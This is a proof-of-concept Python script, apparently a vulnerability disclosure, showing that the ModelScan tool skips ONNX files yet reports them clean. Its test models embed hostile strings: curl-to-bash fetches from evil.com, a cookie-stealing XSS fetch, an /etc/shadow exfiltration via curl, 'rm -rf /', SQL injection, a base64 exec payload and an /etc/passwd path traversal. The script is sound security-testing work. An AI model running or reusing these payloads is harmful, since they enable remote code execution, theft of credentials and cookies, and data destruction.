# onnx-modelscan-gap-poc / poc_modelscan_onnx_gap.py
# (Hugging Face file-viewer header, commented out so the file parses:
#  "Rammadaeus's picture / Upload poc_modelscan_onnx_gap.py with huggingface_hub / 0b6c068 verified")
#!/usr/bin/env python3
"""
ModelScan ONNX Scanning Gap PoC
VULNERABILITY:
ModelScan (by ProtectAI) claims to scan ML model files for security issues.
However, it completely SKIPS all ONNX model files. When pointed at an ONNX
file, ModelScan reports "No issues found!" while simultaneously noting in
fine print that the file was "skipped" and "not scanned."
This means any ONNX model -- regardless of how malicious -- passes ModelScan
with a clean bill of health.
IMPACT:
- ONNX models can contain custom operator implementations that reference
attacker-controlled shared libraries (.so/.dll)
- ONNX models can reference external data files via relative paths,
enabling path traversal attacks (e.g. ../../../etc/passwd)
- ONNX models can embed arbitrary strings in metadata and operator attributes
(shell commands, Python code, injection payloads)
- ONNX Runtime custom ops can execute arbitrary native code at inference time
- ModelScan reports ALL of these as clean, giving false confidence
- Users who rely on ModelScan to vet ONNX files before loading them get
zero protection
AFFECTED:
- modelscan 0.8.7 (latest as of 2026-02-16)
- All ONNX model files are completely unscanned
TESTED: modelscan 0.8.7, onnx 1.20.1, Python 3.12
Usage:
python3 poc_modelscan_onnx_gap.py
"""
# Standard library: filesystem paths, exit handling, and driving the modelscan CLI.
import os
import sys
import subprocess
# onnx is required to build the PoC model files; fail fast with a hint if missing.
try:
    import onnx
    from onnx import TensorProto, helper
    # NOTE(review): dead flag — the except branch calls sys.exit(1), so any
    # importer of this module only ever observes HAS_ONNX == True.
    HAS_ONNX = True
except ImportError:
    HAS_ONNX = False
    print("[!] WARNING: onnx package not installed. Install with: pip install onnx")
    sys.exit(1)
# Locate the modelscan CLI: prefer the pip --user install location, then fall
# back to whatever is on PATH (or the bare name, letting exec resolution fail
# later with a clear FileNotFoundError).
_user_install = os.path.expanduser("~/.local/bin/modelscan")
if os.path.exists(_user_install):
    MODELSCAN_BIN = _user_install
else:
    import shutil
    MODELSCAN_BIN = shutil.which("modelscan") or "modelscan"
def create_simple_onnx_model(output_path):
    """Write a benign single-node (Identity) ONNX model to *output_path*.

    Serves as the clean baseline against which the malicious models are compared.
    """
    in_info = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
    out_info = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
    node = helper.make_node("Identity", inputs=["X"], outputs=["Y"])
    model = helper.make_model(
        helper.make_graph([node], "simple_graph", [in_info], [out_info]),
        opset_imports=[helper.make_opsetid("", 13)],
    )
    model.doc_string = "A simple identity model"
    onnx.save(model, output_path)
    print(" Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
def create_suspicious_custom_op_model(output_path):
    """Write an ONNX model using a custom operator from an attacker domain.

    Custom ops are resolved against externally loaded shared libraries at
    runtime. Here one operator attribute carries a literal shell command and a
    metadata entry embeds a Python os.system payload — both pure strings, but
    exactly the kind of content a scanner should surface.
    """
    in_info = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
    out_info = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
    node = helper.make_node(
        "MaliciousTransform",
        inputs=["X"],
        outputs=["Y"],
        domain="com.attacker.evil_ops",
        name="evil_custom_op",
    )
    # Attach a shell command as an operator attribute.
    node.attribute.append(
        helper.make_attribute("shell_cmd", "curl http://evil.com/payload | bash")
    )
    model = helper.make_model(
        helper.make_graph([node], "custom_op_graph", [in_info], [out_info]),
        opset_imports=[
            helper.make_opsetid("", 13),
            helper.make_opsetid("com.attacker.evil_ops", 1),
        ],
    )
    model.doc_string = "Model with custom operator that could load malicious shared library"
    # Embed a Python one-liner in the model metadata.
    prop = model.metadata_props.add()
    prop.key = "loader_script"
    prop.value = "import os; os.system('curl http://evil.com/shell.sh | bash')"
    onnx.save(model, output_path)
    print(" Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
def create_external_data_traversal_model(output_path):
    """Write an ONNX model whose weights reference external data via traversal.

    The "weights" initializer is re-marked as EXTERNAL and pointed at
    ../../../etc/passwd, so a loader that resolves external data relative to
    the model directory would read outside it.
    """
    in_info = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
    out_info = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
    weights = helper.make_tensor(
        "weights", TensorProto.FLOAT, [5, 5],
        [float(i) for i in range(25)]
    )
    node = helper.make_node("MatMul", inputs=["X", "weights"], outputs=["Y"])
    model = helper.make_model(
        helper.make_graph(
            [node], "external_data_graph", [in_info], [out_info],
            initializer=[weights],
        ),
        opset_imports=[helper.make_opsetid("", 13)],
    )
    # Rewrite the initializer we just added to point at an external location.
    target = next(t for t in model.graph.initializer if t.name == "weights")
    target.data_location = TensorProto.EXTERNAL
    for key, value in (
        ("location", "../../../etc/passwd"),
        ("offset", "0"),
        ("length", "100"),
    ):
        kv = target.external_data.add()
        kv.key = key
        kv.value = value
    # Drop the inline payload so only the external reference remains.
    target.ClearField("float_data")
    target.ClearField("raw_data")
    onnx.save(model, output_path)
    print(" Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
def create_metadata_injection_model(output_path):
    """Write an ONNX model carrying injection payloads in its metadata.

    Covers XSS, SQL injection, Python RCE one-liners, and a base64-encoded
    exec string in doc_string — all inert data in the file itself, but content
    a security scanner is expected to flag.
    """
    in_info = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
    out_info = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
    node = helper.make_node("Identity", inputs=["X"], outputs=["Y"])
    model = helper.make_model(
        helper.make_graph([node], "metadata_graph", [in_info], [out_info]),
        opset_imports=[helper.make_opsetid("", 13)],
    )
    for key, value in (
        ("description", "<script>fetch('http://evil.com/steal?cookie='+document.cookie)</script>"),
        ("author", "'; DROP TABLE models; --"),
        ("license", "__import__('os').system('rm -rf /')"),
        ("post_load_hook", "import subprocess; subprocess.run(['curl', 'http://evil.com/exfil', '-d', '@/etc/shadow'])"),
    ):
        prop = model.metadata_props.add()
        prop.key = key
        prop.value = value
    model.doc_string = "eval(__import__('base64').b64decode('aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2lkJyk='))"
    onnx.save(model, output_path)
    print(" Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
def run_modelscan(model_path, label):
    """Run the modelscan CLI on *model_path*, echo its output, and parse it.

    Returns a dict with keys: "scanned", "issues_found", "no_issues_reported",
    "skipped". A missing binary or a timeout yields the skipped/unscanned dict.
    """
    print("\n --- ModelScan on: {} ---".format(label))
    failure = {"scanned": False, "issues_found": 0,
               "no_issues_reported": False, "skipped": True}
    env = os.environ.copy()
    env["PATH"] = os.path.expanduser("~/.local/bin") + ":" + env.get("PATH", "")
    try:
        proc = subprocess.run(
            [MODELSCAN_BIN, "scan", "-p", model_path, "--show-skipped"],
            capture_output=True, text=True, timeout=60, env=env,
        )
    except FileNotFoundError:
        print(" ERROR: modelscan binary not found at {}".format(MODELSCAN_BIN))
        return failure
    except subprocess.TimeoutExpired:
        print(" ERROR: Timed out")
        return failure
    output = proc.stdout + proc.stderr
    # Drop TF/CUDA startup noise before echoing the scanner's output.
    noise = ("cuda", "CUDA", "TensorFlow binary", "To enable",
             "settings file detected", "cpu_feature_guard")
    kept = [ln for ln in output.split("\n")
            if not any(tok in ln for tok in noise)]
    for raw in "\n".join(kept).strip().split("\n"):
        text = raw.strip()
        if text:
            print(" | {}".format(text))
    # Parse the scanner's verdict out of the combined stdout+stderr.
    lowered = output.lower()
    skipped = "skipped" in lowered and "did not scan" in lowered
    issues_count = 0
    if "Total Issues:" in output:
        for line in output.split("\n"):
            if "Total Issues:" in line:
                try:
                    issues_count = int(line.split(":")[-1].strip())
                except ValueError:
                    pass
    return {
        "scanned": not skipped,
        "issues_found": issues_count,
        "no_issues_reported": "No issues found" in output,
        "skipped": skipped,
    }
def main():
    """Build the four PoC ONNX models, scan each with ModelScan, summarize."""
    banner = "=" * 70
    print(banner)
    print("ModelScan ONNX Scanning Gap PoC")
    print(banner)
    print()
    print("modelscan binary: {}".format(MODELSCAN_BIN))
    models_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "models")
    os.makedirs(models_dir, exist_ok=True)
    # (section header, output filename, builder function, summary label)
    specs = (
        ("\n 1. Simple legitimate model (baseline):",
         "simple_identity.onnx", create_simple_onnx_model,
         "simple_identity.onnx (clean baseline)"),
        ("\n 2. Custom operator with shell command attribute:",
         "custom_op_suspicious.onnx", create_suspicious_custom_op_model,
         "custom_op_suspicious.onnx (shell_cmd in attacker domain)"),
        ("\n 3. External data with path traversal:",
         "external_data_traversal.onnx", create_external_data_traversal_model,
         "external_data_traversal.onnx (../../../etc/passwd)"),
        ("\n 4. Metadata injection payloads:",
         "metadata_injection.onnx", create_metadata_injection_model,
         "metadata_injection.onnx (XSS + SQLi + RCE + b64 exec)"),
    )
    models = []
    print("\n[*] Creating test ONNX models...")
    for title, fname, builder, label in specs:
        print(title)
        path = os.path.join(models_dir, fname)
        builder(path)
        models.append((label, path))
    # Scan each model
    print("\n" + banner)
    print("[*] Running ModelScan on each model...")
    results = [(label, run_modelscan(path, label)) for label, path in models]
    # Summary
    print("\n" + banner)
    print("RESULTS SUMMARY:")
    print("-" * 70)
    all_skipped = True
    all_no_issues = True
    for label, r in results:
        if r["skipped"]:
            status = "SKIPPED (not scanned) but reported 'No issues found'"
        elif r["no_issues_reported"]:
            status = "NO ISSUES FOUND"
        elif r["issues_found"] > 0:
            status = "ISSUES FOUND: {}".format(r["issues_found"])
            all_no_issues = False
        else:
            status = "UNKNOWN"
        if not r["skipped"]:
            all_skipped = False
        print(" {} => {}".format(label, status))
    print()
    if all_skipped:
        print("VULNERABILITY CONFIRMED: ModelScan SKIPS all ONNX files entirely.")
        print("It reports 'No issues found!' while the --show-skipped output reveals")
        print("'Model Scan did not scan file' for every single ONNX model.")
        print()
        print("This means ModelScan provides ZERO security coverage for ONNX models:")
        print(" - Custom operators from attacker-controlled domains: NOT SCANNED")
        print(" - Shell command strings in operator attributes: NOT SCANNED")
        print(" - Path traversal in external data references: NOT SCANNED")
        print(" - Code injection payloads in metadata: NOT SCANNED")
        print(" - base64-encoded Python exec in doc_string: NOT SCANNED")
        print()
        print("The 'No issues found!' message creates a false sense of security.")
        print("Users trust ModelScan to protect them from malicious models, but")
        print("ONNX -- one of the most widely used ML formats -- is completely blind.")
    elif all_no_issues:
        print("CONFIRMED: ModelScan reports no issues for all ONNX models.")
    else:
        print("ModelScan detected some issues. Review output above.")
    print(banner)
# Script entry point: run the PoC only when executed directly, not on import.
if __name__ == "__main__":
    main()